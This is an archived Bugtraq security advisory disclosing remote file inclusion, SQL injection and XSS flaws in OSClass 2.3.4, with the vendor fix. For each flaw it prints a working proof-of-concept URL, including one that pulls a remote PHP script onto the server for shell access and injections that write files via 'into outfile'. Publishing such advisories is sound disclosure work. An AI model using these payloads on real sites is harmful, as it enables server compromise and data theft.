lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <9FD841D6-CBAF-4238-9030-603BBF29384F@codseq.it>
Date: Mon, 30 Jan 2012 13:31:58 +0100
From: Filippo Cavallarin <filippo.cavallarin@...seq.it>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in OSClass

Advisory ID:	CSA-12003
Title:	Multiple vulnerabilities in OSClass
Product:	OSClass
Version:	2.3.4 and probably prior
Vendor:	osclass.org
Vulnerability type:	SQL injection, XSS, Remote file inclusion
Vendor notification:	2012-01-12
Public disclosure:	2012-01-27


OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put an arbitrary file (ie a melicious php script) on the server under the www root so it's possible to execute shell commands with the previleges of the webserver 
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php

http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in admin's ajax interface when performing the "edit_category_post" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability; gpc_magic_quotes must be off

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201



3) SQL injection in admin's ajax interface when performing the "enable_category" action. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201

(id must be a valid subcategory id - in this case gpc_magic_quotes can be on)



4) XSS in admin's' ajax interface. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E

(id must be a valid category id)


Solution

upgrade to OSClass 2.3.5

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@...seq.it

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ